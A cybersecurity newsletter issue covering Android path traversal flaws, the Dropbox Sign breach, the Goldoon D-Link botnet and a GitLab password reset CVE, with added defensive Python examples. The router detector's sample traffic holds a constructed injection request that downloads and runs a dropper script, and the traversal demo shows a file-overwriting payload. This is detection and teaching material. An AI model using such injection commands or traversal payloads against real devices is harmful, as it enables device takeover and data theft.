May 03 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that wishes there wasn't plenty more phish in the cyber-sea.
It's Friday, folks, which can only mean one thing… It's time for our weekly segment!
It goes by many names. Patch of the Week, Tweak of the Week. Okay, that's it.
Congrats, the cybercriminals are no match… for your patch!
Patch Now Available for Vulnerable Android Apps, incl. Xiaomi, WPS Office!
Attention Android users! Act swiftly to safeguard your devices! Popular apps like Xiaomi File Manager and WPS Office were recently found vulnerable to a serious path traversal flaw, putting over 1 billion and 500 million installs at risk, respectively. The flaw, disclosed by Microsoft, sits in how the apps handle files shared with them by other apps: a malicious app can hand over a file whose name contains path traversal sequences (such as "../"), and the receiving app dutifully writes it outside the folder it intended, into its own private storage.
Because that private storage holds the app's own configuration, libraries and credentials, overwriting the right file can give an attacker code execution in the context of the affected app, along with theft of its tokens and unauthorised access to your sensitive data.
But fret not! Both Xiaomi and WPS Office shipped fixes in February 2024. Update your apps now to close the hole. Remember, your security matters!
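To make the bug class concrete, here is an added example (not code from the newsletter, Microsoft, Xiaomi or WPS Office) written in Python rather than the Kotlin/Java of a real Android app. It stands in a temporary directory for an app's private data folder, then saves a "shared" file under an attacker-chosen display name the way the affected apps did, beside a hardened version that refuses anything that is not a plain file name and double-checks that the resolved path stays inside the cache directory. The malicious file name and the session file it clobbers are constructed for the demo.

```python
import os
import tempfile


def make_app_dirs():
    """Stand-in for an Android app's private data dir (constructed for this demo):
    cache/ is where received files are meant to land, shared_prefs/ holds secrets."""
    root = tempfile.mkdtemp(prefix="appdata-")
    for sub in ("cache", "shared_prefs"):
        os.makedirs(os.path.join(root, sub))
    with open(os.path.join(root, "shared_prefs", "session.xml"), "w") as f:
        f.write('<map><string name="token">ORIGINAL</string></map>')
    return root


def save_shared_file_vulnerable(app_root, display_name, data):
    """The vulnerable pattern: trust the sender's file name and join it onto cache/.
    A name like '../shared_prefs/session.xml' walks out of cache/ and overwrites
    the app's own preferences."""
    cache_dir = os.path.join(app_root, "cache")
    target = os.path.join(cache_dir, display_name)  # ".." is honoured here
    with open(target, "wb") as f:
        f.write(data)
    rel = os.path.relpath(os.path.realpath(target), os.path.realpath(app_root))
    return rel.replace(os.sep, "/")


def save_shared_file_safe(app_root, display_name, data):
    """Hardened version: (1) accept only a bare file name, (2) as defence in depth,
    verify that the resolved path is still inside cache/ before writing."""
    cache_dir = os.path.realpath(os.path.join(app_root, "cache"))
    if (not display_name
            or display_name in (".", "..")
            or "\x00" in display_name
            or "/" in display_name
            or "\\" in display_name):  # conservative: treat backslash as a separator too
        raise ValueError(f"rejected display name: {display_name!r}")
    target = os.path.realpath(os.path.join(cache_dir, display_name))
    if os.path.commonpath([cache_dir, target]) != cache_dir:
        raise ValueError(f"path escapes cache dir: {display_name!r}")
    with open(target, "wb") as f:
        f.write(data)
    rel = os.path.relpath(target, os.path.realpath(app_root))
    return rel.replace(os.sep, "/")


def demo():
    """Feed the same malicious name to both versions and report what happened."""
    root = make_app_dirs()
    evil_name = "../shared_prefs/session.xml"            # constructed attacker input
    payload = b'<map><string name="token">ATTACKER</string></map>'

    written = save_shared_file_vulnerable(root, evil_name, payload)
    with open(os.path.join(root, "shared_prefs", "session.xml"), "rb") as f:
        prefs_overwritten = f.read() == payload

    try:
        save_shared_file_safe(root, evil_name, payload)
        safe_blocked = False
    except ValueError:
        safe_blocked = True

    return {"vulnerable_wrote": written,          # "shared_prefs/session.xml"
            "prefs_overwritten": prefs_overwritten,  # True
            "safe_blocked": safe_blocked}            # True


if __name__ == "__main__":
    print(demo())
```

The first check alone (no separators, no dot-entries) is what stops the traversal; the `commonpath` check is there so that a future refactor that starts accepting sub-paths cannot silently reintroduce the escape. Better still, as Microsoft's guidance suggests, generate your own file name and ignore the sender's entirely.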
Now, on to today's hottest cybersecurity news stories:
- Dropbox users beware! Digital signature breach affects all users
- Enter Goldoon botnet, targeting D-Link routers w/ decade-old flaw
- GitLab password reset vulnerability is being exploited, warns CISA
Cloud storage giant Dropbox revealed on Wednesday that its digital signature product, Dropbox Sign (formerly HelloSign), fell victim to a breach by as yet unidentified threat actors. The incident exposed emails, usernames and account settings for all users of the service, as disclosed in a filing with the U.S. Securities and Exchange Commission (SEC). Dropbox became aware of the intrusion on April 24, 2024; it is the second such incident to hit the company within two years.
Scope of the Breach
According to Dropbox, the attackers accessed a wealth of user data, including emails, usernames, phone numbers, hashed passwords, and certain authentication information such as API keys and OAuth tokens. The breach also reached third parties who merely received or signed a document through Dropbox Sign without ever creating an account, exposing their names and email addresses. Investigators found no evidence that the contents of users' accounts (documents and agreements) or payment information were accessed, but the exposure of credentials and tokens is serious in its own right.
Modus Operandi
The attackers compromised a service account within Dropbox Sign's backend, a non-human account used to run automated services, and leveraged its elevated privileges to reach the customer database. The intrusion is believed to have started with the compromise of a Dropbox Sign automated system configuration tool. Dropbox did not disclose the exact number of affected customers, but it has reset users' passwords, logged them out of connected devices, and is rotating all API keys and OAuth tokens to limit the damage.
Response and Ongoing Investigation
Dropbox says it is cooperating with law enforcement and regulators and will contact affected users directly with guidance. The investigation is ongoing to establish the full extent of the incident and to harden the environment against a repeat.
Strengthening Security Measures
The lesson for everyone else is an old one: service accounts with broad production privileges are exactly the credentials an attacker wants, so they deserve the same scrutiny (least privilege, monitoring, regular rotation) as any human admin account. Dropbox's prompt disclosure and wholesale credential rotation show what a competent response looks like once the damage is done.
While the fallout from the breach remains a concern, Dropbox's efforts to contain the incident and support affected users are a reminder of the ongoing battle to protect sensitive information in an ever-changing threat landscape.
Security researchers have uncovered a new botnet dubbed Goldoon, which exploits a critical security flaw dating back almost a decade in D-Link routers. The vulnerability, CVE-2015-2051, affects D-Link DIR-645 routers and lets remote attackers execute arbitrary commands via specially crafted HTTP requests to the router's HNAP management interface. Once compromised, these devices become conduits for further attacks, including distributed denial-of-service (DDoS) assaults.
Modus Operandi
The Goldoon botnet leverages CVE-2015-2051 to execute a dropper script fetched from a remote server, which in turn downloads a next-stage payload built for various Linux system architectures. That payload acts as a downloader for the Goldoon malware itself, retrieved from a remote endpoint. To cover its tracks, the dropper removes the executed file and then deletes itself. Goldoon establishes persistence on the host and connects to a command-and-control (C2) server to await instructions. The malware carries 27 DDoS flood attack methods, spanning multiple protocols.
Evolving Threat Landscape
The vulnerability is not new, but its exploitation underscores how cybercriminals and advanced persistent threat (APT) actors keep mining old, unpatched edge devices. Compromised routers serve as anonymisation layers and are rented out for various illicit activities, from proxy services to launching attacks. Recent incidents, including the dismantling of the MooBot botnet by the U.S. government, highlight the pervasive threat posed by compromised routers, and Trend Micro's observations show how readily such devices are repurposed for a range of malicious activities.
Securing the Infrastructure
Goldoon reinforces the importance of timely patching of known vulnerabilities, and of retiring devices that will never receive a patch: the DIR-645 is end-of-life, so the only real fix is replacement or, at minimum, keeping its management interface off the internet. Organisations and individuals alike must treat their network edge as part of their attack surface, because a nine-year-old bug is still a bug if the box is still switched on.
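Defenders who still have HNAP-speaking D-Link gear on the wire can at least spot this traffic. Below is an added example (not from the newsletter or from the Goldoon research) that parses raw HTTP requests and flags HNAP calls whose SOAPAction header carries shell metacharacters after the action name. Public advisories for CVE-2015-2051 describe the injection point as the SOAPAction header of a GetDeviceSettings request, and the example assumes that shape; the three sample requests, the 192.0.2.10 download host (a TEST-NET address) and the dropper file name are all constructed for the demo.

```python
import re

# Constructed sample traffic as a router's web server, or a sensor in front of it,
# would see it. None of this is captured Goldoon traffic.
SAMPLE_REQUESTS = [
    # 1. legitimate HNAP call from a management client
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n"
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"\r\n'
    "Content-Length: 0\r\n\r\n",
    # 2. command injection in the SOAPAction header: the action name is followed by a
    #    backtick-wrapped shell command that fetches and runs a dropper script
    "POST /HNAP1/ HTTP/1.1\r\nHost: 192.168.0.1\r\n"
    'SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp; '
    'wget http://192.0.2.10/dropper.sh; chmod 777 dropper.sh; sh dropper.sh`"\r\n'
    "Content-Length: 0\r\n\r\n",
    # 3. unrelated request to the admin UI, ignored by the HNAP inspector
    "GET /index.html HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n",
]

SHELL_META = re.compile(r"[`;|&]|\$\(")                 # command separators / substitution
DOWNLOADER = re.compile(r"\b(wget|curl|tftp|ftpget)\b")  # typical dropper fetch tools
HNAP_ACTION = re.compile(r"http://purenetworks\.com/HNAP1/([A-Za-z]+)(/.*)?")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_hnap(raw):
    """Return a verdict dict for HNAP requests, or None for non-HNAP traffic."""
    method, path, headers, _body = parse_request(raw)
    if not path.startswith("/HNAP1"):
        return None
    action = headers.get("soapaction", "").strip('"')
    m = HNAP_ACTION.fullmatch(action)
    if not m:
        return {"verdict": "suspicious", "reason": "malformed SOAPAction", "action": action}
    name, tail = m.group(1), m.group(2) or ""
    # A legitimate action ends at the name. Anything after it containing shell
    # metacharacters is being passed to the device's shell by the vulnerable firmware.
    if tail and SHELL_META.search(tail):
        return {"verdict": "exploit", "action": name, "injected": tail.strip("/"),
                "fetches_payload": bool(DOWNLOADER.search(tail))}
    return {"verdict": "benign", "action": name}


def scan(requests):
    """Run the inspector over a batch of raw requests; drop non-HNAP traffic."""
    return [r for r in (inspect_hnap(x) for x in requests) if r is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

A `fetches_payload` hit is the Goldoon pattern described above (inject, pull a dropper, execute); the URL in the injected tail is the indicator to block and to hunt for elsewhere on the network.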
Stay ahead of the curve with Presspool.ai! Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." That's us, alright! How about you? Visionary AI executive, much?
And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too, which is sure to help you make the most of our new artificial overlords and put them to work for your business.
Rest assured, the process is very straightforward.
You simply:
- Sign up and create a campaign.
- Define your audience, budget, and message to captivate your audience.
- Launch your campaign, as Presspool's AI matches it with ideal newsletter audiences for optimal reach and conversions.
- Finally, you leverage real-time analytics to track performance and refine future strategies. Elevate your marketing game and stay informed with Presspool.ai! Simples!
Presspool.ai may just have what you need to succeed. And if the product isn't for you, the newsletter alone is a gamechanger. And we know newsletters.
CISA has added a critical GitLab vulnerability, tracked as CVE-2023-7028, to its Known Exploited Vulnerabilities catalogue because it is being exploited in the wild. The flaw, which carries a maximum CVSS score of 10.0, lets an attacker trigger a password reset for a victim's account and have the reset email delivered to an unverified, attacker-controlled address, which is all it takes for an account takeover.
The Risk
The vulnerability affects self-managed GitLab CE and EE from 16.1.0 up to the fixed releases (16.1.0 before 16.1.6, 16.2 before 16.2.9, 16.3 before 16.3.7, 16.4 before 16.4.5, 16.5 before 16.5.6, 16.6 before 16.6.4 and 16.7 before 16.7.2). Any instance that still allows username and password login, even alongside SSO, is exposed; accounts with two-factor authentication enabled can have their password reset but cannot be taken over without the second factor. Successful exploitation hands the attacker the user's account, and with it access to private repositories, the ability to tamper with source code and CI configuration, and a foothold for supply chain attacks downstream.
Mitigations
GitLab released the fix in January 2024 in versions 16.5.6, 16.6.4 and 16.7.2, with backports to 16.1.6, 16.2.9, 16.3.7 and 16.4.5. Under the KEV listing, federal agencies must apply the updates by May 22, 2024; everyone else should not wait that long. GitLab also recommends enabling two-factor authentication for all users, and checking gitlab-rails/production_json.log for POST requests to /users/password whose email parameter is an array holding more than one address, which is the signature of an exploitation attempt.
Patching known, actively exploited vulnerabilities promptly is the single cheapest defence there is. Stay informed and proactive to protect your digital assets and ensure a resilient security posture.
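For admins who want to check whether they were targeted before they patched, here is an added example (not from the newsletter or from GitLab) in Python. It does two things: classifies a GitLab version string as vulnerable or not using the fixed-release list above, and scans lines in the shape of gitlab-rails/production_json.log for password reset requests whose email parameter arrived as an array, which is how the exploit smuggles in the second, unverified address. The log lines are constructed for the demo (RFC 5737 IP addresses, RFC 2606 email domains); the exact field layout of a real log may differ slightly, so treat the parsing as an assumption to adapt.

```python
import json

# First patched release for each affected minor series (GitLab advisory, January 2024).
# Versions before 16.1 and from 16.8 onwards are outside the affected range.
FIXED_PATCH = {(16, 1): 6, (16, 2): 9, (16, 3): 7, (16, 4): 5,
               (16, 5): 6, (16, 6): 4, (16, 7): 2}


def is_vulnerable(version):
    """True if this GitLab version is affected by CVE-2023-7028 (e.g. '16.5.3-ee')."""
    core = version.split("-")[0]            # drop edition suffixes like -ee / -ce
    major, minor, patch = (int(x) for x in core.split(".")[:3])
    fix = FIXED_PATCH.get((major, minor))
    if fix is None:
        return False
    return patch < fix


# Constructed lines in the shape of gitlab-rails/production_json.log. Not a real capture.
SAMPLE_LOG = r'''
{"method":"GET","path":"/users/password/new","status":200,"remote_ip":"198.51.100.7","time":"2024-05-01T09:12:01.000Z","params":[]}
{"method":"POST","path":"/users/password","status":302,"remote_ip":"198.51.100.7","time":"2024-05-01T09:12:05.000Z","params":[{"key":"authenticity_token","value":"[FILTERED]"},{"key":"user","value":{"email":"alice@example.com"}}]}
{"method":"POST","path":"/users/password","status":302,"remote_ip":"203.0.113.44","time":"2024-05-01T09:14:19.000Z","params":[{"key":"authenticity_token","value":"[FILTERED]"},{"key":"user","value":{"email":["alice@example.com","attacker@example.net"]}}]}
{"method":"POST","path":"/api/v4/projects","status":201,"remote_ip":"198.51.100.9","time":"2024-05-01T09:15:00.000Z","params":[{"key":"name","value":"demo"}]}
'''


def param(entry, key):
    """Look up a request parameter in GitLab's [{"key":..,"value":..}, ...] layout."""
    for p in entry.get("params", []):
        if p.get("key") == key:
            return p.get("value")
    return None


def find_reset_abuse(log_text):
    """Return password reset requests whose user[email] was submitted as an array.
    A normal reset form sends one string; the exploit sends user[email][]=victim
    and user[email][]=attacker so the reset mail goes to both."""
    hits = []
    for line in log_text.strip().splitlines():
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue
        if entry.get("method") != "POST" or entry.get("path") != "/users/password":
            continue
        user = param(entry, "user")
        email = user.get("email") if isinstance(user, dict) else None
        if isinstance(email, list):
            hits.append({"time": entry.get("time"),
                         "remote_ip": entry.get("remote_ip"),
                         "emails": email,
                         "multiple_addresses": len(email) > 1})
    return hits


if __name__ == "__main__":
    print("16.5.3 vulnerable:", is_vulnerable("16.5.3"))    # True
    print("16.5.6 vulnerable:", is_vulnerable("16.5.6"))    # False
    for hit in find_reset_abuse(SAMPLE_LOG):
        print(hit)
```

Every hit deserves a follow-up: confirm whether the listed victim account's password or email was actually changed afterwards, and, if it was, treat the account and any tokens or SSH keys it owns as compromised. GitLab's advisory additionally points at gitlab-rails/audit_json.log, where a successful reset shows up under PasswordsController#update with the same multi-address target.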
๐๏ธ Extra, Extra! Read all about it! ๐๏ธ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
๐ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐
๐ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐
๐ย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐พ
Let us know what you think.
So long and thanks for reading all the phish!